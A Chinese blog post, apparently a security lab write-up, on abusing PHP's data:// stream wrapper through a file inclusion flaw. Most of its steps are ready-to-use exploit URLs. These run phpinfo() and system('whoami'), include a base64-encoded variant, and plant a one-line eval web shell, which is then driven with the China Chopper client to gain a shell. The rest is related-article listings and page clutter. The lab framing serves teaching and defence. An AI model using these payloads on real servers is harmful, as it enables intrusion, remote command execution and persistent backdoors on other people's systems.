PHP封装伪协议之data流

最新推荐文章于 2024-04-22 16:19:24 发布
最新推荐文章于 2024-04-22 16:19:24 发布
阅读量608 收藏
点赞数
文章标签: php 服务器 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73720136/article/details/130544036
版权

实验原理

PHP有很多内置URL风格的封装协议,这类协议与fopen(),copy(),file_exists(),filesize()等文件系统函数所提供的功能类似。
这类协议有:


利用PHP封装伪协议中data数据流,通过文件包含漏洞进行命令执行。

实验步骤

1、登录操作机,打开浏览器,在浏览器中访问http://ip/include/include.php

2、访问http://ip/include/include.php?page=data://text/plain,<?php phpinfo();?>,代码执行

3、也可以:将代码进行base64编码,访问http://ip/include/include.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

4、访问http://ip/include/include.php?page=data://text/plain,<?php system(‘whoami’);?>,系统命令执行

5、访问http://ip/include/include.php?page=data://text/plain,<?php @eval($_POST[666]);?>,执行一句话木马

6、打开桌面tools文件夹的“中国菜刀(过狗)”,双击exe文件

7、在空白处鼠标右击,点击“添加”,添加shell地址

  • 地址为:一句话木马地址和连接密码
  • 脚本类型:PHP

8、点击“添加”,双击一句话木马地址

实验总结

通过本实验,利用PHP封装伪协议中的data流,进行代码执行和系统命令执行,也可以对代码进行base64编码,同样可以执行一句话木马,从而Getshell。
对伪协议的用法总结如下:
 

韩无棣
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
标准的TS协议封装文件
04-08
标准的TS协议封装的测试文件,文件时长3min17sec,画面高清,可用于编解码实验使用。这里分享给大家。
javascript自执行函数之伪命名空间封装
10-28
比较之后,我们可以发现,第二方法更加的直观,易于理解。但是少了封装过程,代码完全裸露在外。
PHP代码审计15—PHP伪协议入门
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-20 934
PHP简单的伪协议使用
【CTF | 网络安全】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议
等风来
05-22 8634
该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议PHP内置函数等知识点,希望读者躬身实践。我是秋说,我们下次见。
PHP伪协议详解
Python老吕的博客
03-06 1209
PHP伪协议PHP自己支持的一种协议与封装协议,简单来说就是PHP定义的一种特殊访问资源的方法。有些伪协议成功执行需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
filer协议 input伪协议 Data伪协议
qq_26335381的博客
11-03 946
php://filter 读取文件源码php://input 任意代码执行data://text/plain 任意代码执行zip:// 配合文件上传开启后门 下面拿ct.要成功应用伪协议需要php.ini文件的allow_url_fopen 默认开启allow_url_include 默认关闭file://伪协议此协议可以在双off的情况下使用,用于访问本地文件使用方法:file://文件绝对路径和文件名 如http://127.0.0.1/cmd.php?
文件包含支持的伪协议
qq_50673174的博客
05-15 7323
文件包含漏洞的补充。 主要是文件包含漏洞支持的伪协议
php伪协议
weixin_60719780的博客
01-27 3863
PHP伪协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出data:// 数据zip:// 压缩 不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
PHP 伪协议
m0_56107268的博客
11-08 5224
php伪协议
【每天学习一点新知识】文件包含常用之伪协议
RexHa的博客
02-06 3411
一些比较常用的php伪协议用法及部分演示过程
PHP伪协议浅析(一)
qq_43006864的博客
12-28 961
PHP伪协议浅析 起因也是解CTF。然后遇到了第一次,当时粗略的看了这个东西,但没深入去看。后面又连续又到了几次。这里也和大家分享一下。 一、file:// 协议(这个用的蛮多了) 条件: allow_url_fopen:off/on allow_url_include :off/on 作用: 用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。include()/require()/include_
关于php支持的协议与封装协议总结(推荐)
10-18
主要给大家介绍了关于php支持的协议与封装协议的相关资料,文中通过示例代码介绍的非常详细,对大家学习或者使用PHP具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧。
浅谈PHP封装CURL
01-02
CURL是一个非常强大的开源库,支持很多协议,包括HTTP、FTP、TELNET等,我们使用它来发送HTTP请求。它给我 们带来的好处是可以通过灵活的选项设置不同的HTTP协议参数,并且支持HTTPS。CURL可以根据URL前缀是“HTTP” 还是“HTTPS”自动选择是否加密发送内容。 使用CURL的PHP扩展完成一个HTTP请求的发送一般有以下几个步骤: 1.初始化连接句柄; 2.设置CURL选项; 3.执行并获取结果; 4.释放VURL连接句柄。 PHP.ini扩展开启 //使用curl发送请求 第一个参数发送的url地址,第二个参数是否发送post请求,默认是发送get请求,第
Altera封装datasheet汇总.pdf
01-14
Altera芯片封装datasheet的汇总资料
php开发工程师系统性教学】——Laravel框架(验证码)的配置和使用的保姆式教程
php优质创造者
04-21 1608
👨‍💻。
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
ALex_zry的博客
04-22 469
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
webman 事务回滚失效问题记录
juan9872的博客
04-21 753
webman是一款基于workerman开发的高性能HTTP服务框架。webman用于替代传统的php-fpm架构,提供超高性能可扩展的HTTP服务。你可以用webman开发网站,也可以开发HTTP接口或者微服务。除此之外,webman还支持自定义进程,可以做workerman能做的任何事情,例如websocket服务、物联网、游戏、TCP服务、UDP服务、unix socket服务等等。
Laravel 6 - 第十五章 验证器
最新发布
逆旅岁月的博客
04-22 1468
用于验证输入数据是否符合特定规则的一个组件,Laravel 6 提供了一个简洁且强大的验证系统,可以轻松验证来自用户输入或其他来源的数据。
PHP定时任务框架taskPHP3.0学习记录5环境部署常见问题及解决方案
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
04-19 840
如果你在使用 PHP 代码时遇到了 “function popen is disabled” 的错误,这意味着 PHP 配置中禁用了 popen 函数的使用。在命令行中运行一个简单的 PHP 脚本,使用 extension_loaded(‘redis’) 来检查 Redis 扩展是否已加载。找到 disable_functions 指令,从该指令中移除 popen,保存文件并重启 web 服务器。当出现一下错误,说明php版本不支持,建议升级php版本,至少>5.6。
帧内封装的协议:data是什么
05-24
在帧内封装的协议中,data是指要传输的数据。这些数据可以是文本、图像、音频或视频等各种形式的信息。在帧内封装的协议中,数据通常被分成一系列的帧(Frame),每个帧都包含了一定量的数据,以及一些头部信息和尾部信息,用于描述数据的类型、长度、校验等信息。这些头部和尾部信息也被称为帧头(Frame Header)和帧尾(Frame Footer),它们可以帮助接收方正确地解析和处理数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值